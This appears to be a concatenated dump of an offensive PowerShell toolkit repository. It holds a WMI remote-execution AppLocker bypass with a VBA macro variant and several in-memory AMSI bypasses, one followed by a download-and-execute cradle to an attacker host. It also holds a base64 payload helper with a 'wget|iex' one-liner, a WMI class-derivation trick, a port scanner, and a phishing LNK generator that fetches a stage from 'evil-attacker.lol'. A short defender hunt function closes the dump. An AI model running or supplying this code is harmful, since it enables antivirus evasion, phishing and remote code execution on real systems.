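    # Poll until the created process is gone instead of sleeping a fixed 0.6 s.
    $deadline = (Get-Date).AddSeconds($TimeoutSec)
    do {
        Start-Sleep -Milliseconds 250
        $alive = Get-WmiObject @wmi -Class Win32_Process -Filter "ProcessId = $($r.ProcessId)"
    } while ($alive -and (Get-Date) -lt $deadline)
    if ($alive) { throw "Process $($r.ProcessId) still running after $TimeoutSec s" }

    # Read the result back over the admin share (C:\Temp\x.txt -> \\target\C$\Temp\x.txt).
    $share = '\\' + $Target + '\' + ($OutFile -replace '^([A-Za-z]):', '$1$$')
    Get-Content -Path $share
}

# Local test, as in the original script:
Invoke-WmiCommand -Target 127.0.0.1 -Command 'net localgroup'
# Remote: Invoke-WmiCommand -Target 'Victime-PC' -Command 'whoami /all' -Credential (Get-Credential 'WORKGROUP\admin')
```

Two things to keep in mind: the `C$` read at the end uses your current logon session, not `-Credential`, so map the share with `net use` first if the two differ; and the spawned powershell.exe still runs under whatever language mode AppLocker imposes, which is fine for commands like `net localgroup` but is why `-UseCmd` exists.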

#>

$Target = "127.0.0.1"
$Command = "net localgroup > C:\temp\result.txt"
$Payload = "CMD.EXE /c "+$Command

# Base64 (UTF-16LE) form of the command, for a powershell.exe -EncodedCommand variant when powershell.exe is available on the target.
# The original computed this from $Bypass (the WMI call result object) after the call, which was a no-op.
$EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
# $Payload = "powershell.exe -NoProfile -EncodedCommand $EncodedPayload"

$Bypass=Invoke-WmiMethod -class Win32_process -name Create -ArgumentList $Payload -ComputerName $Target

Start-Sleep -Milliseconds 600
Get-Content \\$Target\C$\Temp\result.txt

<#
.SYNOPSIS
PowerShell WMI semi-interactive shell VBA macro (basic) for AppLocker policy bypass

.DESCRIPTION
Office macro example that reproduces the previous PowerShell script in a restricted (Citrix etc.) environment.
As there is no base64 encoding, some commands could fail; to get around that, add the b64 encoding before executing the payload.

.EXAMPLE

Sub sss()
    Dim wsh As Object
    Set wsh = VBA.CreateObject("WScript.Shell")
    Dim waitOnReturn As Boolean: waitOnReturn = True
    Dim windowStyle As Integer: windowStyle = 1

    wsh.Run "powershell.exe Invoke-WmiMethod -class Win32_process -name Create -ArgumentList 'cmd.exe /c netstat -ano >> C:/Temp/test' -ComputerName '127.0.0.1'", windowStyle, waitOnReturn
    wsh.Run "powershell.exe -NoExit Get-content C:/Temp/test"
End Sub
#>
--------------------------------------------------------------------------------
/amsi-bypass.ps1:
--------------------------------------------------------------------------------
######################################################################################################################################
# Latest (and useful!)
AMSI bypass using egghunting method (from June 2019) 3 | # Last test: 19th May 2020 4 | # 5 | # 6 | # Example on how to use-it for real-life payload delivery : https://github.com/kmkz/exploit/blob/master/Full-payload-delivery-chain.ps1 7 | ###################################################################################################################################### 8 | Write-Host "-- AMSI Patch" 9 | Write-Host "-- Paul Laîné (@am0nsec)" 10 | Write-Host "" 11 | 12 | $Kernel32 = @" 13 | using System; 14 | using System.Runtime.InteropServices; 15 | 16 | public class Kernel32 { 17 | [DllImport("kernel32")] 18 | public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); 19 | 20 | [DllImport("kernel32")] 21 | public static extern IntPtr LoadLibrary(string lpLibFileName); 22 | 23 | [DllImport("kernel32")] 24 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 25 | } 26 | "@ 27 | 28 | Add-Type $Kernel32 29 | 30 | Class Hunter { 31 | static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) { 32 | while ($true) { 33 | [int]$count = 0 34 | 35 | while ($true) { 36 | [IntPtr]$address = [IntPtr]::Add($address, 1) 37 | If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) { 38 | $count++ 39 | If ($count -eq $egg.Length) { 40 | return [IntPtr]::Subtract($address, $egg.Length - 1) 41 | } 42 | } Else { break } 43 | } 44 | } 45 | 46 | return $address 47 | } 48 | } 49 | 50 | [IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll") 51 | Write-Host "[+] AMSI DLL Handle: $hModule" 52 | 53 | [IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow") 54 | Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress" 55 | 56 | If ([IntPtr]::Size -eq 8) { 57 | Write-Host "[+] 64-bits process" 58 | [byte[]]$egg = [byte[]] ( 59 | 0x4C, 0x8B, 0xDC, # mov r11,rsp 60 | 0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx 61 | 0x49, 
        0x89, 0x6B, 0x10,       # mov qword ptr [r11+10h],rbp
        0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi
        0x57,                   # push rdi
        0x41, 0x56,             # push r14
        0x41, 0x57,             # push r15
        0x48, 0x83, 0xEC, 0x70  # sub rsp,70h
    )
} Else {
    Write-Host "[+] 32-bits process"
    [byte[]]$egg = [byte[]] (
        0x8B, 0xFF,             # mov edi,edi
        0x55,                   # push ebp
        0x8B, 0xEC,             # mov ebp,esp
        0x83, 0xEC, 0x18,       # sub esp,18h
        0x53,                   # push ebx
        0x56                    # push esi
    )
}
[IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg)
Write-Host "[+] Targeted address: $targetedAddress"

$oldProtectionBuffer = 0
[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null

$patch = [byte[]] (
    0x31, 0xC0,                 # xor eax,eax (on x64 this zeroes rax as well)
    0xC3                        # ret
)
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3)

$a = 0
[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null

<#

AMSI bypass historic



----------------------------------------------------------------------------------------------------------------------
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
$e=new-object net.webclient;
$e.proxy=[Net.WebRequest]::GetSystemWebProxy();
$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $e.downloadstring('http://attacker-trusted-domain/pwn');

######################################################################################################################################
# Tested on Win10 (31/10/2018)
#
# Source: https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html
######################################################################################################################################

function Bypass-AMSI
{
    if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
        [Reflection.Assembly]::Load([Convert]::FromBase64String("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")) | Out-Null
        Write-Output "DLL has been reflected";
    }
    [Bypass.AMSI]::Disable()

    #
    # You can put malicious powershell here to execute-it when Bypass-AMSI function is triggered
    # -> in case of msfvenom usage : use psh-net as format
    # -> customize the PowerShell code in order to bypass A.V detection (or use other tools such like unicorn)
}

######################################################################################################################################
[**] update 08/01/2019 from rasta-mouse's AmsiScanBufferBypass project (https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/):
######################################################################################################################################
$Ref = (
    "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
)

$Source = @"
using System;
using System.Runtime.InteropServices;

namespace Bypass
{
    public class AMSI
    {
        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);

        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
        static extern void MoveMemory(IntPtr dest, IntPtr src, int size);

        public static int Disable()
        {
            IntPtr TargetDLL = LoadLibrary("amsi.dll");
            if (TargetDLL == IntPtr.Zero) { return 1; }

            IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer");
            if (ASBPtr == IntPtr.Zero) { return 1; }

            UIntPtr dwSize = (UIntPtr)5;
            uint Zero = 0;

            if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; }

            Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
            IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
            Marshal.Copy(Patch, 0, unmanagedPointer, 6);
            MoveMemory(ASBPtr, unmanagedPointer, 6);

            return 0;
        }
    }
}
"@

Add-Type -ReferencedAssemblies $Ref -TypeDefinition $Source -Language CSharp

[+] Usage:
PS C:\Users\jmbourbon\Desktop\R&D> . .\amsi-bypass.ps1
PS C:\Users\jmbourbon\Desktop\R&D> [Bypass.AMSI]::Disable()
0

PS C:\Users\jmbourbon\Desktop\R&D> "AmsiScanBuffer"
AmsiScanBuffer

#>
--------------------------------------------------------------------------------
/base64-encode.ps1:
--------------------------------------------------------------------------------
# B64 Encoding:
$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\jmbourbon\Desktop\TOOLS\PowerShell\amsi-bypass.ps1")))
Write-Output $Base64 | Out-File "payload-b64"

# B64 Decoding:
$bytes = [Convert]::FromBase64String($Base64)
[IO.File]::WriteAllBytes("C:\Users\jmbourbon\Desktop\TOOLS\PowerShell\payload-b64-decoded", $bytes)

# Then host the b64 file and iwr (Invoke-WebRequest) or wget it (shortest way):
powershell "wget 192.168.1.1/f|iex"
--------------------------------------------------------------------------------
/class-derivation.ps1:
--------------------------------------------------------------------------------
$C = [WmiClass] '/root/cimv2:Win32_Process'
$N = $C.derive('MyEvilProcess')
$N.Put()
Write-Output $N
Invoke-WmiMethod MyEvilProcess -Name CrEaTe -ArgumentList calc.exe
--------------------------------------------------------------------------------
/multi-host-port-scan.ps1:
--------------------------------------------------------------------------------

#usage:

#[ ] PS> .\script.ps1 hostlist.txt portlist.txt


param([string]$list1,[string]$list2)
if ($list1 -eq ""){
    Write-Host "Please supply Host-list!!" -ForegroundColor Red
    break
}
If ($list2 -eq ""){
    Write-Host "Please supply Port-List!!" -ForegroundColor Red
    break
}
[Array]$hostlist = Get-Content $list1
[Array]$ports = Get-Content $list2
$ErrorActionPreference = "SilentlyContinue"
$ping = new-object System.Net.NetworkInformation.Ping
foreach ($ip in $hostlist) {
    $rslt = $ping.send($ip)
    if (! $?){
        Write-Host "Host: $ip - not found" -ForegroundColor Red
    }
    else {
        if ($rslt.status.tostring() -eq "Success") {
            write-host "Host: $ip - Ports: " -foregroundColor Green -NoNewline
            foreach ($port in $ports){
                # With SilentlyContinue a refused/filtered port leaves $socket empty instead of throwing
                $socket = new-object System.Net.Sockets.TcpClient($ip, $port)
                if ($socket -eq $null) {
                    write-host "$port," -ForegroundColor Red -NoNewline
                }
                else {
                    write-host "$port," -foregroundcolor Green -NoNewline
                    $socket.Close()
                    $socket = $null
                }
            }
        }
        else {
            write-host "Host: $ip - down" -ForegroundColor Red
        }
    }
    Write-Host ""
}
$ping = $null
--------------------------------------------------------------------------------
/ole-payload-generator.ps1:
--------------------------------------------------------------------------------
# - Original script: https://ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-ole-+-lnk

# UserAgent Randomization :
$browsers = @('Firefox','Chrome','InternetExplorer','Opera','Safari')
$browsertype = Get-Random -InputObject $browsers
$UA = [Microsoft.PowerShell.Commands.PSUserAgent]::$browsertype

# Payload (containing both stage 1 and stage 2) :
$ProxyAware = "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials"
$Payload = "$ProxyAware;iwr https://evil-attacker.lol/stage1 -UserAgent '$UA'|iex"

Write-Output "`n[*] Clear text payload: $Payload"

$Dump = [System.Text.Encoding]::Unicode.GetBytes($Payload)
$EncodedPayload = [Convert]::ToBase64String($Dump)

Write-Output "-----------------------"
Write-Output "`n[*] Encoded payload: $EncodedPayload `n"


$obj = New-object -comobject wscript.shell
$filename=Get-Random -Minimum 1 -Maximum 100
$shortcut = "C:\Users\tata\Desktop\Confidential-$filename.lnk"

$link = $obj.createshortcut($shortcut)
$link.windowstyle = "7"
$link.targetpath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$link.iconlocation = "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"
$link.arguments = "-Nop -sta -noni -w hidden -ec $EncodedPayload"
$link.save()

Write-Output "-----------------------"
Write-Output "`n`n[*] Payload generated in $shortcut !`n"
--------------------------------------------------------------------------------
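The class-derivation.ps1 trick above leaves a durable artefact behind: a non-standard subclass of Win32_Process in root\cimv2 that inherits Create(). The following hunt function is an added defender-side example, not code from this repository; it assumes that a stock Windows install ships no subclass of Win32_Process, so baseline your own hosts before alerting on a hit.

```powershell
# Added example (not part of the kmkz/PowerShell repo): hunt for classes derived from
# Win32_Process, the artefact written by class-derivation.ps1 ($C.derive(...).Put()).
# Assumption: no subclass of Win32_Process exists in root\cimv2 on a default install,
# so every object returned is worth a look (baseline first, then alert on deltas).
function Find-DerivedProcessClass {
    [CmdletBinding()]
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [string]$Namespace    = 'root/cimv2',
        [string[]]$ParentClass = @('Win32_Process')
    )

    # DCOM rather than WinRM: the PoC itself only needs WMI/DCOM reachable, so the
    # hunt can run against the same hosts the attacker could reach.
    $opt     = New-CimSessionOption -Protocol Dcom
    $session = New-CimSession -ComputerName $ComputerName -SessionOption $opt
    try {
        Get-CimClass -CimSession $session -Namespace $Namespace |
            Where-Object { $ParentClass -contains $_.CimSuperClassName } |
            ForEach-Object {
                [pscustomobject]@{
                    Computer   = $ComputerName
                    Namespace  = $Namespace
                    ClassName  = $_.CimClassName
                    SuperClass = $_.CimSuperClassName
                    # An inherited Create() is what makes the derived class usable for
                    # process launch via Invoke-WmiMethod, as in the PoC.
                    HasCreate  = [bool]($_.CimClassMethods | Where-Object Name -eq 'Create')
                    # Methods/properties added beyond the parent hint at a custom class body.
                    MethodCount = @($_.CimClassMethods).Count
                }
            }
    }
    finally {
        Remove-CimSession $session
    }
}

# Usage: no output means nothing derives from Win32_Process on that host.
Find-DerivedProcessClass | Format-Table -AutoSize
```

Run it with `-ComputerName` across the hosts that the WMI stager could reach; a class such as `MyEvilProcess` with `HasCreate = True` is the direct fingerprint of the technique, and `Get-CimClass` is read-only so the check itself changes nothing on the host.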